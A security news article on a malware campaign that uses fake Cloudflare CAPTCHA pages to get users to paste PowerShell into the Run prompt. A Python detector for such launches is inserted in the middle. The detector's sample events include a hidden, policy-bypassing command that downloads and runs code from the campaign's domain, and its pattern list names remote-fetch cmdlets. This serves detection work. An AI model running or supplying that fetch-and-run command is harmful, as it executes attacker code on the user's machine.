A new and highly deceptive malware campaign is using fake Cloudflare verification pages to lure unsuspecting users into installing malicious software. This social engineering tactic marks a concerning evolution in how cybercriminals exploit users’ trust in widely recognized security services.
The attack begins with a webpage that looks like a legitimate Cloudflare CAPTCHA check. Victims believe they are completing a routine security verification, but in reality, they are triggering a malware installation process. By mimicking a trusted brand like Cloudflare, attackers take advantage of the public’s familiarity with such interfaces, lowering skepticism and increasing the likelihood of compliance.
According to analysts, including Shaquib Izhar, this campaign is particularly dangerous due to its layered approach. After the victim clicks the “Verify” button on the fake CAPTCHA screen, malicious PowerShell code is silently copied to the user’s clipboard. At the same time, the page logs the victim’s IP address, which is used for initial reconnaissance. The attackers further trick users by prompting another round of verification, reinforcing the illusion of legitimacy while monitoring behavior through embedded keystroke tracking.
From a technical perspective, the campaign features a sophisticated infection chain that avoids traditional security tools. Once users open the Windows Run prompt and execute the copied command, their machine connects to the attacker’s control infrastructure using embedded webhooks. This allows real-time updates to be sent to the threat actors about the victim’s actions.
The copied PowerShell command retrieves an encoded payload from pastesio[.]com, which downloads a hardcoded batch file from axiomsniper[.]info. This BAT file is not only packed with evasion techniques but also includes checks to detect virtual machines. If one is detected, the malware halts execution to avoid being analyzed in sandbox environments.
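As an added example (not code from the article or from the researcher it cites), the following Python detector scores process-creation events for the paste-and-run chain described above: a shell spawned from the Run prompt (parent explorer.exe), quiet or encoded launch flags, remote-fetch cmdlets, and the two domains named in this write-up. The event shape, command lines and the encoded placeholder are constructed for illustration.

```python
import re

# Constructed sample events in a Sysmon Event ID 1 (process creation) shape.
# They are illustrative only, not telemetry captured from the campaign.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (iwr https://pastesio.com/raw/x).Content"'},
    {"parent": "explorer.exe", "image": "cmd.exe", "cmdline": "cmd /c start notepad.exe"},
    {"parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": "powershell -NoProfile -File C:\\scripts\\inventory.ps1"},
    # "QQBBAEEA" is UTF-16LE "AAA", a harmless placeholder for an encoded payload.
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -EncodedCommand QQBBAEEA"},
]

# Domains named in the write-up, kept defanged; refanged only for matching.
IOC_DOMAINS = ["pastesio[.]com", "axiomsniper[.]info"]

# Argument patterns that commonly appear when a pasted one-liner has to stay
# quiet and fetch a second stage. Each is checked case-insensitively.
SUSPICIOUS_ARGS = {
    "encoded_command": r"(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}",
    "hidden_window": r"(^|\s)-w(indowstyle)?\s+hidden",
    "bypass_policy": r"(^|\s)-e(xecution)?p(olicy)?\s+bypass",
    "remote_fetch": r"\b(iwr|invoke-webrequest|downloadstring|invoke-expression|iex)\b",
}

def analyze_event(event):
    """Return reasons this process-creation event looks like a ClickFix-style
    paste-and-run launch; an empty list means nothing suspicious was seen."""
    reasons = []
    cmd = event["cmdline"]
    # The Run prompt is hosted by explorer.exe, so a PowerShell process whose
    # parent is explorer.exe is the signature of the "paste into Win+R" step.
    if event["parent"].lower() == "explorer.exe" and \
       event["image"].lower() in ("powershell.exe", "pwsh.exe"):
        reasons.append("shell_from_run_prompt")
    for name, pattern in SUSPICIOUS_ARGS.items():
        if re.search(pattern, cmd, re.IGNORECASE):
            reasons.append(name)
    for domain in IOC_DOMAINS:
        if domain.replace("[.]", ".") in cmd.lower():
            reasons.append(f"ioc_domain:{domain}")
    # A lone launch from Run is normal admin behaviour; require a second signal.
    return reasons if len(reasons) >= 2 else []

def scan(events):
    """Map each event index to its findings, dropping clean events."""
    return {i: r for i, e in enumerate(events) if (r := analyze_event(e))}
```

Running `scan(SAMPLE_EVENTS)` flags the first and last events and leaves the ordinary cmd.exe launch and the scheduled inventory script alone.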
What makes this attack even more alarming is that the BAT file currently goes undetected by all scanners on VirusTotal. This zero-detection status illustrates the growing threat of fileless and behaviorally stealthy malware that bypasses signature-based antivirus solutions.
In summary, this campaign demonstrates how attackers are refining their social engineering skills and technical delivery methods. It highlights the urgent need for security teams to adopt behavioral detection strategies and improve user awareness training with a focus on recognizing even familiar-looking threats.